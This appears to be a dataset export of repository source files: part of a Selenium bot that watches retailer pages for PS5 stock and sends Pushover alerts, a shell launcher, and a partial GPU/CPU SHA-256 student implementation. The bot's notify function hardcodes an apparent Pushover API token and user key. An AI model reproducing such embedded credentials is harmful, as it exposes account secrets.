False)\nPROFILE.set_preference(\"permissions.default.image\", 2)\nPROFILE.set_preference(\"http.response.timeout\", 5)\nPROFILE.set_preference(\"dom.max_script_run_time\", 5)\n\nPROFILE.set_preference(\"privacy.socialtracking.block_cookies.enabled\", True)\nPROFILE.set_preference(\"privacy.trackingprotection.annotate_channels\", True)\nPROFILE.set_preference(\"privacy.trackingprotection.cryptomining.enabled\", True)\nPROFILE.set_preference(\"privacy.trackingprotection.enabled\", True)\nPROFILE.set_preference(\"privacy.trackingprotection.fingerprinting.enabled\", True)\nPROFILE.set_preference(\"privacy.trackingprotection.pbmode.enabled\", True)\nPROFILE.set_preference(\"services.sync.prefs.sync.privacy.trackingprotection.cryptomining.enabled\", True)\nPROFILE.set_preference(\"services.sync.prefs.sync.privacy.trackingprotection.enabled\", True)\nPROFILE.set_preference(\"services.sync.prefs.sync.privacy.trackingprotection.fingerprinting.enabled\", True)\nPROFILE.set_preference(\"services.sync.prefs.sync.privacy.trackingprotection.pbmode.enabled\", True)\nPROFILE.set_preference(\"privacy.clearOnShutdown.cache\", True)\nPROFILE.set_preference(\"privacy.clearOnShutdown.cookies\", True)\nPROFILE.set_preference(\"privacy.clearOnShutdown.sessions\", True)\nPROFILE.set_preference(\"privacy.donottrackheader.enabled\", True)\nPROFILE.set_preference(\"dom.moduleScripts.enabled\", False)\nPROFILE.set_preference(\"javascript.enabled\", False)\n\n\nglobal DRIVER\nDRIVER = webdriver.Firefox(firefox_profile=PROFILE, firefox_binary='/usr/bin/firefox', executable_path='./geckodriver', options=OPTIONS)\n\n# Logging setup\nlogging.basicConfig(filename='logs/' + str(date.today()), format='%(asctime)s %(levelname)s: %(message)s', datefmt='%d/%m/%Y %H:%M:%S', level=logging.INFO)\n\n# Send notification to device(s)\ndef notify(title, message, url=None):\n token = 'a6j96sdv4z8j3jifiofo2for72fr6b'\n user = 'ucseovragtfce3ibsnocdxx64x3bx4'\n data = {'token':token, 'user':user, 'message':message, 'device':'iphone', 'title':title, 'priority':'1'}\n if url is not None:\n data['url'] = url\n r = requests.post(\"https://api.pushover.net/1/messages.json\", data=data)\n\n if int(r.status_code) == 200:\n logging.info('Notification posted.')\n else:\n logging.error('Notification post failed with status: ' + r.status_code + ' ' + r.reason)\n\n# Exit handler with cleanup\ndef exit_handler():\n exit_message = \"Application exiting...\"\n logging.info(exit_message)\n notify(exit_message, 'Bye!')\n DRIVER.quit()\n VDISPLAY.stop()\n sys.exit()\n\natexit.register(exit_handler)\n\n# App configuration manager\nclass ConfigManager:\n CONFIG_FNAME = 'config.json'\n CONFIG_VAL_TEST_ENABLED = 'Test enabled'\n CONFIG_VAL_VERBOSE = 'Verbose'\n CONFIG_VAL_PAGE_LOAD_TIMEOUT = 'Page load timeout'\n CONFIG_VAL_COOLDOWN = 'Cooldown time'\n CONFIG_VAL_IMPLICIT_WAIT = 'Implicit wait'\n CONFIG_VAL_EXPLICIT_WAIT = 'Explicit wait'\n CONFIG_VAL_NOTIFICATION_INTERVAL = 'Notification interval'\n CONFIG_VAL_NOTIFICATION_LIMIT = 'Notification limit'\n CONFIG_VAL_NOTIFICATION_TOKEN = 'Notification token'\n CONFIG_VAL_NOTIFICATION_USERID = 'Notification userid'\n CONFIG_VAL_NOTIFICATION_DEVICE = 'Notification device'\n\n def __init__(self):\n self.update_config()\n\n def update_config(self):\n self.config = json.load(open(self.CONFIG_FNAME))\n\n def get_notification_interval(self):\n return self.config[self.CONFIG_VAL_NOTIFICATION_INTERVAL]\n\n def get_notification_limit(self):\n return self.config[self.CONFIG_VAL_NOTIFICATION_LIMIT]\n\n def get_notification_device(self):\n return self.config[self.CONFIG_VAL_NOTIFICATION_DEVICE]\n\n def get_notification_token(self):\n return self.config[self.CONFIG_VAL_NOTIFICATION_TOKEN]\n\n def get_notification_userid(self):\n return self.config[self.CONFIG_VAL_NOTIFICATION_USERID]\n\n def get_page_load_timeout(self):\n return self.config[self.CONFIG_VAL_PAGE_LOAD_TIMEOUT]\n\n def get_cooldown(self):\n return self.config[self.CONFIG_VAL_COOLDOWN]\n\n def get_implicit_wait(self):\n return self.config[self.CONFIG_VAL_IMPLICIT_WAIT]\n\n def get_explicit_wait(self):\n return self.config[self.CONFIG_VAL_EXPLICIT_WAIT]\n\n def test_enabled(self):\n return self.config[self.CONFIG_VAL_TEST_ENABLED]\n\n def verbose(self):\n return self.config[self.CONFIG_VAL_VERBOSE]\n\n def page_enabled(self, page_ID):\n try:\n return self.config[page_ID]\n except KeyError:\n return False\n\n# Status of recent notifications\nclass NotificationStatus:\n def __init__(self):\n self.last_notification_sent = 0.0\n self.recent_notifications = 0\n self.page_healthy = True\n\n def notification_sent(self):\n self.last_notification_sent = time.time()\n self.recent_notifications += 1\n\n def is_limited(self, interval, limit):\n now = time.time()\n if (now - self.last_notification_sent) >= interval:\n self.recent_notifications = 0\n\n if self.recent_notifications >= limit:\n return True\n else:\n return False\n\n def is_healthy(self):\n return self.page_healthy\n\n def unhealthy(self):\n self.page_healthy = False\n\n# Used to track and limit the number of notifications sent for each page\nclass NotificationLimiter:\n def __init__(self, pages):\n self.notification_interval = 600\n self.notification_limit = 1\n self.page_notifications = {}\n for page in pages:\n self.page_notifications[page.ID] = NotificationStatus()\n\n def get_notification_status(self, ID):\n return self.page_notifications[ID]\n\n def update_limits(self, interval, limit):\n self.notification_interval = interval\n self.notification_limit = limit\n\n# Simple page\nclass Page:\n def __init__(self, edition, name, url, stock_xpath, price_xpath, cart_xpath=None, test=False):\n # Console edition\n self.edition = edition\n # Page name\n self.name = name\n # Unique ID\n self.ID = \" \".join([name, edition])\n # Page url\n self.url = url\n # Xpath to element that describes stock\n self.stock_xpath = stock_xpath\n # Xpath to element that describes price\n self.price_xpath = price_xpath\n # Xpath to \"add to cart\" button\n self.cart_xpath = cart_xpath\n # Whether page used for testing\n self.test = test\n\n# Amazon page\nclass AmazonPage(Page):\n def __init__(self, edition, name, url, stock_xpath, price_xpath, sed_button_xpath=None, ded_button_xpath=None, cart_xpath=None, test=False):\n super().__init__(edition, name, url, stock_xpath, price_xpath, cart_xpath=cart_xpath, test=test)\n # Button to select standard ps5 edition\n self.sed_button_xpath = sed_button_xpath\n # Button to select digital ps5 edition\n self.ded_button_xpath = ded_button_xpath\n\n# Page names\nPAGE_AMAZONNL = 'Amazon.nl'\nPAGE_AMAZONDE = 'Amazon.de'\nPAGE_AMAZONIT = 'Amazon.it'\nPAGE_AMAZONES = 'Amazon.es'\nPAGE_AMAZONFR = 'Amazon.fr'\nPAGE_AMAZONPL = 'Amazon.pl'\nPAGE_AMAZONUK = 'Amazon.co.uk'\nPAGE_TOPO = 'Topocentras.lt'\nPAGE_TECHNO = 'Technorama.lt'\nPAGE_GAMEROOM = 'Gameroom.lt'\n\npages = []\n\npages.append(Page(\n\"Digital\",\nPAGE_TOPO,\n\"https://www.topocentras.lt/zaidimu-kompiuteris-sony-playstation-5-digital.html\",\n\"//*[@id='productPage']/div/div/article/div[2]/div[2]/div/h1\",\n\"//*[@id='productPage']/div[2]/div/article/div[2]/div[2]/div[2]/div[1]/div[2]/div[1]/span\",))\n\npages.append(Page(\n\"Digital\",\nPAGE_TOPO,\n\"https://www.topocentras.lt/zaidimu-pultas-sony-dualsense-ps5.html\",\n\"//*[@id='productPage']/div[2]/div[2]/div[1]/h1\",\n\"//*[@id='productPage']/div[2]/div/article/div[2]/div[2]/div[2]/div[1]/div[2]/div[1]/span\",\ntest=True))\n\npages.append(Page(\n\"Standard\",\nPAGE_TOPO,\n\"https://www.topocentras.lt/zaidimu-kompiuteris-sony-playstation-5.html\",\n\"//*[@id='productPage']/div/div/article/div[2]/div[2]/div/h1\",\n\"//*[@id='productPage']/div[2]/div/article/div[2]/div[2]/div[2]/div[1]/div[2]/div[1]/span\",))\n\npages.append(AmazonPage(\n\"Digital\",\nPAGE_AMAZONUK,\n\"https://www.amazon.co.uk/PlayStation-5-Digital-Edition-Console/dp/B08H97NYGP\",\n\"//*[@id='availability']/span\",\n\"//*[@id='priceblock_ourprice']\"))\n\npages.append(AmazonPage(\n\"Digital\",\nPAGE_AMAZONDE,\n\"https://www.amazon.de/dp/B08H98GVK8\",\n\"//*[@id='availability']/span\",\n\"//*[@id='priceblock_ourprice']\"))\n\npages.append(AmazonPage(\n\"Standard\",\nPAGE_AMAZONDE,\n\"https://www.amazon.de/dp/B08H93ZRK9\",\n\"//*[@id='availability']/span\",\n\"//*[@id='priceblock_ourprice']\"))\n\npages.append(AmazonPage(\n\"Digital\",\nPAGE_AMAZONPL,\n\"https://www.amazon.pl/Sony-PlayStation-5-Digital-Edition/dp/B08H98GVK8\",\n\"//*[@id='availability']/span\",\n\"//*[@id='priceblock_ourprice']\"))\n\npages.append(AmazonPage(\n\"Standard\",\nPAGE_AMAZONIT,\n\"https://www.amazon.it/Playstation-Sony-PlayStation-5/dp/B08KKJ37F7\",\n\"//*[@id='availability']/span\",\n\"//*[@id='priceblock_ourprice']\"))\n\npages.append(AmazonPage(\n\"Digital\",\nPAGE_AMAZONIT,\n\"https://www.amazon.it/_itm/dp/B08KJF2D25\",\n\"//*[@id='availability']/span\",\n\"//*[@id='priceblock_ourprice']\"))\n\npages.append(AmazonPage(\n\"Digital\",\nPAGE_AMAZONIT,\n\"https://www.amazon.it/Sony-PlayStation%C2%AE5-DualSenseTM-Wireless-Controller/dp/B08H99BPJN\",\n\"//*[@id='availability']/span\",\n\"//*[@id='priceblock_ourprice']\",\ntest=True))\n\npages.append(AmazonPage(\n\"Standard\",\nPAGE_AMAZONES,\n\"https://www.amazon.es/dp/B08KKJ37F7\",\n\"//*[@id='availability']/span\",\n\"//*[@id='priceblock_ourprice']\"))\n\npages.append(AmazonPage(\n\"Digital\",\nPAGE_AMAZONES,\n\"https://www.amazon.es/dp/B08KJF2D25\",\n\"//*[@id='availability']/span\",\n\"//*[@id='priceblock_ourprice']\"))\n\npages.append(AmazonPage(\n\"Standard\",\nPAGE_AMAZONFR,\n\"https://www.amazon.fr/PlayStation-%C3%89dition-Standard-DualSense-Couleur/dp/B08H93ZRK9\",\n\"//*[@id='availability']/span\",\n\"//*[@id='priceblock_ourprice']\"))\n\npages.append(AmazonPage(\n\"Digital\",\nPAGE_AMAZONFR,\n\"https://www.amazon.fr/PlayStation-Digital-Manette-DualSense-Couleur/dp/B08H98GVK8\",\n\"//*[@id='availability']/span\",\n\"//*[@id='priceblock_ourprice']\"))\n\n# pages.append(AmazonPage(\n# PAGE_AMAZONNL,\n# \"https://www.amazon.nl/-/en/dp/B08H93ZRK9\",\n# \"//*[@id='availability']/span\",\n# \"//*[@id='priceblock_ourprice']\",\n# \"//*[@id='a-autoid-13-announce']\",\n# \"//*[@id='a-autoid-14-announce']\"))\n\nOUTOFSTOCK = []\nOUTOFSTOCK.append('Obecnie niedostępny')\nOUTOFSTOCK.append('Non disponibile')\nOUTOFSTOCK.append('No disponible')\nOUTOFSTOCK.append('indisponible')\nOUTOFSTOCK.append('de ces vendeurs')\nOUTOFSTOCK.append('nicht verfügbar')\nOUTOFSTOCK.append('unavailable')\n\nNOTIFICATION_LIMITER = NotificationLimiter(pages)\nCONFIG_MANAGER = ConfigManager()\n\nDRIVER.set_page_load_timeout(CONFIG_MANAGER.get_page_load_timeout())\nDRIVER.implicitly_wait(CONFIG_MANAGER.get_implicit_wait())\n\ndef randinrange(range):\n return range[0] + (range[1]-range[0])*random.random()\n\ndef get_page_notification_status(page_id):\n try:\n return NOTIFICATION_LIMITER.get_notification_status(page_id)\n except KeyError:\n logging.error(\"Notification status could not be found for page: \" + page_id)\n return None\n\ndef ps5_detected(page, reason, price):\n notification_status = None\n can_send_notification = False\n limit_reached = False\n\n notification_status = get_page_notification_status(page.ID)\n\n if notification_status is not None:\n notification_interval = NOTIFICATION_LIMITER.notification_interval\n notification_limit = NOTIFICATION_LIMITER.notification_limit\n if not notification_status.is_limited(notification_interval, notification_limit):\n can_send_notification = True\n notification_status.notification_sent()\n if notification_status.is_limited(notification_interval, notification_limit):\n limit_reached = True\n\n title = page.ID\n message = \" \".join([reason, price])\n\n if limit_reached:\n message = \"Limit reached! \" + message\n if not can_send_notification:\n message = \"Limited! \" + message\n logging.warning(\"Notification limit reached.\")\n\n print_text = \" | \".join([title, message])\n logging.info(print_text)\n\n if can_send_notification:\n notify(title, message, page.url)\n\ndef extract_text(element):\n text = ''.join(map(lambda x: x.text, element)).strip()\n return text\n\ndef stock_price_from_xpath(driver, page):\n # Wait until the stock element has loaded, then extract it\n try:\n wait = CONFIG_MANAGER.get_explicit_wait()\n el = WebDriverWait(driver, timeout=wait).until(lambda d: d.find_element_by_xpath(page.stock_xpath))\n except Exception:\n pass\n try:\n extracted_stock = extract_text(driver.find_elements_by_xpath(page.stock_xpath))\n extracted_price = extract_text(driver.find_elements_by_xpath(page.price_xpath))\n except StaleElementReferenceException:\n restart_program(page.ID, page.url)\n\n if CONFIG_MANAGER.verbose():\n logging.info(': '.join([page.ID, extracted_stock]))\n\n return (extracted_stock, extracted_price)\n\ndef page_broken(message, page_id, page_url):\n notification_status = get_page_notification_status(page_id)\n if notification_status.is_healthy():\n notification_status.unhealthy()\n notify(message, page_id, url=page_url)\n\ndef detect_amazon(page, stock, price):\n if stock == '':\n logging.warning(\"Amazon page empty stock element: \" + page.ID)\n page_broken(\"Empty stock element\", page.ID, page.url)\n return\n\n if sum(map(lambda x: x in stock, OUTOFSTOCK)) == 0:\n ps5_detected(page, stock, price)\n\n\n# def tryclickncheck(driver, button_xpath, stock_xpath, price_xpath, page_name):\n# def tryclick(driver, button_xpath):\n# try:\n# button = driver.find_element_by_xpath(button_xpath)\n# button.click()\n# return True\n# except NoSuchElementException:\n# exc, _, _ = sys.exc_info()\n# logging.warning(\"Button was not found: \" + str(exc))\n# return False\n# except Exception:\n# exc, _, _ = sys.exc_info()\n# logging.warning(\"Button could not be clicked: \" + str(exc))\n# return False\n#\n# try:\n# if not tryclick(driver, button_xpath):\n# logging.warning(\"Button click failed, skipping...\")\n# return False\n# time.sleep(randinrange(TIME_SLEEP_AFTER_CLICK_RANGE))\n# stock, price = stock_price_from_xpath(driver, stock_xpath, price_xpath)\n# detect_amazon(stock, price, page_name)\n# return True\n# except IndexError:\n# exc, _, _ = sys.exc_info()\n# logging.warning(\"Some element could not be found: \" + str(exc))\n# return False\n\ndef check_addtocart(driver, cart_xpath):\n if cart_xpath is not None:\n try:\n cart = driver.find_element_by_xpath(cart_xpath)\n driver.execute_script(\"arguments[0].click();\", cart)\n return True\n except NoSuchElementException:\n exc, _, _ = sys.exc_info()\n logging.warning(\"Cart button could not be found: \" + str(exc))\n return False\n except Exception:\n exc, _, _ = sys.exc_info()\n logging.warning(\"Cart button could not be found: \" + str(exc))\n return False\n else:\n return True\n\ndef restart_program(reason, page_url):\n notify(\"Restarting program.\", \"Reason: \" + reason, url=page_url)\n DRIVER.quit()\n VDISPLAY.stop()\n os.execl(sys.executable, os.path.abspath(__file__), *sys.argv)\n\nlogging.info(\"Starting loop...\")\nwhile True:\n start = time.time()\n CONFIG_MANAGER.update_config()\n NOTIFICATION_LIMITER.update_limits(CONFIG_MANAGER.get_notification_interval(), CONFIG_MANAGER.get_notification_limit())\n DRIVER.set_page_load_timeout(CONFIG_MANAGER.get_page_load_timeout())\n DRIVER.implicitly_wait(CONFIG_MANAGER.get_implicit_wait())\n for page in pages:\n if not CONFIG_MANAGER.page_enabled(page.ID):\n continue\n if page.test and (not CONFIG_MANAGER.test_enabled()):\n continue\n\n try:\n DRIVER.get(page.url)\n except TimeoutException:\n logging.warning(\"Selenium timeout for page: \" + page.ID)\n except InvalidSessionIdException:\n logging.error(\"InvalidSessionIdException. Restarting program.\")\n restart_program(page.ID, page.url)\n except:\n exc, _, _ = sys.exc_info()\n logging.error(\"Skipping page: \" + page.ID + ' due to ' + str(exc))\n continue\n\n\n # Amazon pages that need clicking to access PS5 page\n # if page.name in (PAGE_AMAZONDE):\n # if not tryclickncheck(driver, page.sed_button_xpath, page.stock_xpath, page.price_xpath, page.name):\n # logging.warning(\"Retrying Amazon click and check...\")\n # tryclickncheck(driver, page.sed_button_xpath, page.stock_xpath, page.price_xpath, page.name)\n\n # tryclickncheck(driver, page.ded_button_xpath, page.stock_xpath, page.price_xpath, page.name)\n # if not tryclickncheck(driver, page.ded_button_xpath, page.stock_xpath, page.price_xpath, page.name):\n # logging.warning(\"Retrying Amazon click and check...\")\n # tryclickncheck(driver, page.ded_button_xpath, page.stock_xpath, page.price_xpath, page.name)\n\n if isinstance(page, AmazonPage):\n stock, price = stock_price_from_xpath(DRIVER, page)\n detect_amazon(page, stock, price)\n\n elif page.name in (PAGE_TOPO, PAGE_TECHNO, PAGE_GAMEROOM):\n # Temporary solution when there are no PS5 pages in PAGE_TOPO\n # try:\n # msg = driver.find_element_by_xpath(page.stock_xpath).text\n # if 'parduota' not in msg:\n # ps5_detected('empty result', page.name, price, page.edition, page.url)\n # except:\n # ps5_detected('empty result', page.name, \"\", page.edition, page.url)\n # try:\n # msg = driver.find_element_by_xpath(page.price_xpath).text\n # if '17' not in msg:\n # ps5_detected('empty result', page.name, \"\", page.edition, page.url)\n # except:\n # ps5_detected('empty result', page.name, price, page.edition, page.url)\n stock, price = stock_price_from_xpath(DRIVER, page)\n if stock == '' and check_addtocart(DRIVER, page.cart_xpath):\n ps5_detected(page, 'empty result', price)\n\n time.sleep(CONFIG_MANAGER.get_cooldown())\n DRIVER.delete_all_cookies()\n end = time.time()\n logging.info(\"Loop pass completed (\" + str(round(end-start)) + \"s)\")\n" }, { "alpha_fraction": 0.6744186282157898, "alphanum_fraction": 0.6976743936538696, "avg_line_length": 16.200000762939453, "blob_id": "776e15cc9323a0668e59064402178ce6acc04471", "content_id": "b191241d1ea9f6bf25594fd90ee93769704b12f3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 86, "license_type": "no_license", "max_line_length": 22, "num_lines": 5, "path": "/run-ps5.sh", "repo_name": "DomStan/ps5-bot", "src_encoding": "UTF-8", "text": "#!/usr/bin/bash\nrm -f ./logs/*\nrm geckodriver.log\nrm nohup.out\nnohup python3 ps5.py &\n" } ]
4
ChristopheBrown/HASH
https://github.com/ChristopheBrown/HASH
f89bd330c4fb24b91d849a132fb1f0eb5e33c127
10a5d7a9eea38d08ca181b2aca033468f6b548f6
6fe31e152f31d8952af260beca29bac6094b6d46
refs/heads/master
2020-09-23T06:44:50.299994
2019-12-15T21:06:50
2019-12-15T21:06:50
225,430,396
3
0
null
null
null
null
null
[ { "alpha_fraction": 0.5304428339004517, "alphanum_fraction": 0.566766619682312, "avg_line_length": 32.992156982421875, "blob_id": "cea7d5d005905c5b14c307ef4bfc0fe12c328660", "content_id": "da79532f27fcd0a1276ce312bb902a79da4292ff", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8672, "license_type": "permissive", "max_line_length": 110, "num_lines": 255, "path": "/gpu/helper_gpu.py", "repo_name": "ChristopheBrown/HASH", "src_encoding": "UTF-8", "text": "import helper\nimport logic\nimport pycuda.driver as cuda\nfrom pycuda import compiler, gpuarray, tools, cumath\nfrom pycuda.compiler import SourceModule\nimport pycuda.autoinit\nimport datetime\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.patches as mpatches\n\n\n'''\nParallelize the following.\n\nAt this point in the algorithm, the message has been coverted to 8-bit binary\nrepresentation of the ASCII. This binary representation is put into one long string\nwhere (string_length % 512 = 0).\n\nThe string is then broken up into (string_length / 512) chunks.\n\nFor each chunk, there will be a copy, an extend, and a compress\n\nThe compress can only happen sequentially (not parallel) because there are dependencies\nbetween each consecutive iteration. The copy and extend, however, are not \nbound by this constraint\n\nPer the wikipedia article (https://en.wikipedia.org/wiki/SHA-2#Pseudocode), \nthe instructions here are as follows:\n\n create a 64-entry message schedule array w[0..63] of 32-bit words\n (copy) copy chunk into first 16 words w[0..15] of the message schedule array\n (extend) Extend the first 16 words into the remaining 48 words w[16..63] of the message schedule array\n \nThe for loop within copy (as seen in either the wiki article or the helper.py source code),\nsimply writes to [0:16) array locations individually, attention should be made to indexing properly\nOne thread per index is necessary - 16 threads\nAlternatively, if it's worth the marginal speed increase, one thread can be assigned per bit, i.e. 512 threads\n\nThe for loop within extend (as seen in either the wiki article or the helper.py source code),\nperforms several bitwise operations and writes to [16:64) array locations individually\nOne thread per index is necessary - 48 threads\nAlternatively, more threads can be used, e.g.:\n- each index is a threadIdx with a multiple of 10 (0, 10, 20, 30,...,)\n- each thread in between the multiples of hand a single bitwise operator\ni.e. threadIdx = 0 is responsible for index 16, threadIdx = 1 is responsible for s0_p1,\nthreadIdx = 2 is responsible for s0_p2, threadIdx = 3 is responsible for s0_p3 and so on.\nThe \"in-between\" threads calculate a value for the indexing threads to write back the final value\n\n'''\n\nclass HelperGPU(helper.Helper):\n\n def __init__(self, message=\"hello world\"):\n self.msg = message\n self.w = []\n self.h = []\n self.chunks = []\n for i in range(len(self.h_init)):\n self.h.append(self.extend_to_32_bit(bin(self.h_init[i])[2:]))\n \n self.copy_kernel_code = '''\n __global__ void copy_chunks(char* chunk, char* chunk_segment) {\n int tx = threadIdx.x;\n int ty = threadIdx.y;\n \n int index_32_bits = 32 * ty + tx;\n \n chunk_segment[index_32_bits] = chunk[index_32_bits]; \n } \n \n '''\n\n self.extend_kernel_code = ''' \n#include <stdio.h> \n\n#define ARR_SIZE 32\n\n__device__ void rotate_bits(char arr[], int n, char* rotated_array) \n{ \n for (int i=0; i < n; i++) { rotated_array[i] = arr[ARR_SIZE-n+i]; }\n for (int i=n; i<ARR_SIZE; i++) { rotated_array[i] = arr[i-n]; }\n // for (int i=0; i<ARR_SIZE; i++) { arr[i] = rotated_array[i]; }\n} \n\n__device__ void not_binary_string (char* arr, char* not_aray)\n{\n for (int i=0; i < ARR_SIZE; i++) {\n if (arr[i] == '0') not_aray[i] = '1';\n else if (arr[i] == '1') not_aray[i] = '0';\n }\n}\n\n__device__ void and_binary_strings(char a[], char b[], char* and_array)\n{\n for (int i=0; i < ARR_SIZE; i++) {\n if ((a[i] == '1') && (b[i] == '1')) { and_array[i] = '1'; }\n else { and_array[i] = '0'; }\n }\n}\n\n__device__ void shift_bits(char arr[], int n, char* shifted_array) {\n // char rotated_array[ARR_SIZE];\n for (int i=0; i < n; i++) { shifted_array[i] = '0'; }\n for (int i=n; i<ARR_SIZE; i++) { shifted_array[i] = arr[i-n]; }\n for (int i=0; i<ARR_SIZE; i++) { arr[i] = shifted_array[i]; }\n\n}\n \n__device__ void xor_binary_strings(char a[], char b[], char* xor_array) {\n for (int i=0; i < ARR_SIZE; i++) {\n int result = (int) (a[i] == '1') ^ (b[i] == '1');\n if (result) xor_array[i] = '1';\n else xor_array[i] = '0';\n \n }\n} \n\n__device__ void add_binary_strings(char a[], char b[], char* add_array) \n{\n char carry_out = '0';\n char write_back = '0';\n for( int i=ARR_SIZE-1; i>=0; i--) {\n if((a[i]=='1') && (b[i]=='1')) {\n if (carry_out == '1') {\n write_back = '1';\n carry_out = '1';\n } else if (carry_out == '0') {\n write_back = '0';\n carry_out = '1';\n }\n } else if ((a[i]=='1') || (b[i]=='1')) {\n if (carry_out == '1') {\n write_back = '0';\n carry_out = '1';\n } else if (carry_out == '0') {\n write_back = '1';\n carry_out = '0';\n }\n } else {\n if (carry_out == '1') {\n write_back = '1';\n carry_out = '0';\n } else if (carry_out == '0') {\n write_back = '0';\n carry_out = '0';\n }\n }\n add_array[i] = write_back;\n }\n} \n \n__global__ void extend_words(char* chunk_array) {\n \n\n \n} \n'''\n # compile the kernel code\n self.copy_kernel = compiler.SourceModule(self.copy_kernel_code)\n self.extend_kernel = compiler.SourceModule(self.extend_kernel_code)\n \n # get the kernel function from the compiled module\n self.copy = self.copy_kernel.get_function(\"copy_chunks\")\n self.extend = self.extend_kernel.get_function(\"extend_words\") \n \n\n\n def copy_chunk_bits(self, new_chunk=None):\n # self.w = ['0'*32] * 64\n self.w = np.chararray((64,),itemsize=32)\n if new_chunk is None:\n chunk = self.binary_msg_with_padding_and_length[0:512]\n else:\n chunk = new_chunk\n\n # chunk is now a string of length 512 binary chars\n # they need to be broken up into16 individual 32-bit ints\n\n \n input_512x1_bits = gpuarray.to_gpu(np.array([[chunk]], dtype=str))\n output_16x32_bits = gpuarray.to_gpu(self.w)\n \n \n self.copy(\n input_512x1_bits,\n output_16x32_bits, \n block=(32,16,1), \n grid=(1,1,1)\n ) \n \n self.w = output_16x32_bits.get()\n\n\n\n def extend_words(self):\n # I discovered late that the extension cannot be parallelized due to \n # dependencies in between the array indices\n \n #input_64x32_bits = gpuarray.to_gpu(self.w)\n \n #self.extend(\n # input_64x32_bits, \n # block=(32,64,64), \n # grid=(1,1,1)\n #) \n \n #self.w = input_64x32_bits.get()\n \n for i in range(16, 64): # now extend the rest of w[]\n s0_p1 = logic.rotate_bits(self.w[i-15], 7)\n s0_p2 = logic.rotate_bits(self.w[i-15], 18)\n s0_p3 = logic.shift_bits(self.w[i-15], 3)\n s0_xor1 = logic.xor_binary_strings(s0_p1, s0_p2)[2:]\n s0 = logic.xor_binary_strings(s0_xor1, s0_p3)\n s0 = self.extend_to_32_bit(s0)\n\n s1_p1 = logic.rotate_bits(self.w[i-2], 17)\n s1_p2 = logic.rotate_bits(self.w[i-2], 19)\n s1_p3 = logic.shift_bits(self.w[i-2], 10)\n s1_xor1 = logic.xor_binary_strings(s1_p1, s1_p2)[2:]\n s1 = logic.xor_binary_strings(s1_xor1, s1_p3)\n s1 = self.extend_to_32_bit(s1)\n\n add1 = logic.add_binary_strings(self.w[i-16], s0)\n add1 = self.extend_to_32_bit(add1)\n\n add2 = logic.add_binary_strings(self.w[i-7], s1)\n add2 = self.extend_to_32_bit(add2)\n\n\n w_i_no_padding = logic.add_binary_strings(add1, add2)\n w_i_no_padding = self.extend_to_32_bit(w_i_no_padding)\n\n\n # truncate overflow bits - cap at 32 bits\n w_i = logic.and_binary_strings(w_i_no_padding, '11111111111111111111111111111111')[2:]\n w_i = self.extend_to_32_bit(w_i)\n\n self.w[i] = w_i\n \n\n \n \n# bonus function for users who would like to see their system configuration\ndef dev_info():\n dev_data = pycuda.tools.DeviceData()\n\n print(\"CUDA device info\")\n print(\" - Max threads: {}\".format(dev_data.max_threads))\n print(\" - Thread blocks per mp: {}\".format(dev_data.thread_blocks_per_mp))\n print(\" - Shared memory: {}\".format(dev_data.shared_memory))\n print(\"\")\n\n return dev_data\n " }, { "alpha_fraction": 0.632290780544281, "alphanum_fraction": 0.6508875489234924, "avg_line_length": 26.511627197265625, "blob_id": "8331dcc5e3e89cedad9bdff3174cf4db64a158e7", "content_id": "2d936dce7d6c1d3beeef0847a038ae0d5ff1509a", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1183, "license_type": "permissive", "max_line_length": 90, "num_lines": 43, "path": "/cpu/logic.py", "repo_name": "ChristopheBrown/HASH", "src_encoding": "UTF-8", "text": "def binary_string_to_binary_int(val):\n return int(val, base=2)\n\n\ndef rotate_bits(bits, amount):\n if amount >= len(bits): # more rotations than bits\n amount = amount % len(bits)\n\n # slice string in two parts for left and right\n early = bits[0: len(bits) - amount]\n late = bits[len(bits) - amount:]\n # concatenate two parts together\n return late + early\n\n\ndef shift_bits(bits, amount):\n shift = str(bin(binary_string_to_binary_int(bits) >> amount))\n if '0b' in shift: # [2:0] removes the '0b' on binary values\n shift = shift[2:]\n return shift\n\n\ndef xor_binary_strings(str1, str2):\n a = binary_string_to_binary_int(str1)\n b = binary_string_to_binary_int(str2)\n return bin(a ^ b)\n\n\ndef and_binary_strings(str1, str2):\n a = binary_string_to_binary_int(str1)\n b = binary_string_to_binary_int(str2)\n return bin(a & b)\n\n\ndef not_binary_string(str1):\n a = binary_string_to_binary_int(str1)\n return bin(~a & 0xFFFFFFFF) # mask result to avoid negatives (chars are not negative)\n\n\ndef add_binary_strings(str1, str2):\n a = binary_string_to_binary_int(str1)\n b = binary_string_to_binary_int(str2)\n return bin(a + b)\n" }, { "alpha_fraction": 0.507100522518158, "alphanum_fraction": 0.6601406335830688, "avg_line_length": 37.37036895751953, "blob_id": "5cb4d8db3a2fae5dfc11bc2c3049f04c6b96058f", "content_id": "41046ece6982484880affa88772155b27af855eb", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7253, "license_type": "permissive", "max_line_length": 232, "num_lines": 189, "path": "/cpu/sha256_test.py", "repo_name": "ChristopheBrown/HASH", "src_encoding": "UTF-8", "text": "import unittest\nimport sha256\nimport helper\nimport logic\n\n\nclass MyTestCase(unittest.TestCase):\n def test_instance(self):\n sha = sha256.SHA256('Hello world!')\n self.assertIsNotNone(sha)\n\n def test_leading_zeros(self):\n h = helper.Helper()\n too_short = h.add_leading_zeros('1234')\n just_right = h.add_leading_zeros('12345678')\n too_long = h.add_leading_zeros('123456789')\n\n self.assertEqual(too_short, '00001234')\n self.assertEqual(just_right, '12345678')\n self.assertEqual(too_long, '0000000123456789')\n\n def test_convert_string_to_binary(self):\n h = helper.Helper()\n\n small = helper.Helper('a')\n medium = helper.Helper('example')\n large = helper.Helper('this is a long string!')\n\n small.convert_string_to_binary()\n medium.convert_string_to_binary()\n large.convert_string_to_binary()\n\n self.assertEqual(small.binary_msg_plus_one, '011000011')\n self.assertEqual(medium.binary_msg_plus_one, '011001010111100001100001011011010111000001101100011001011')\n self.assertEqual(large.binary_msg_plus_one, '011101000110100001101001011100110010000001101001011100110010000001100001001000000110110001101111011011100110011100100000011100110111010001110010011010010110111001100111001000011')\n\n def test_add_padding(self):\n small = helper.Helper('a')\n medium = helper.Helper('example' * 10)\n large = helper.Helper('this is a 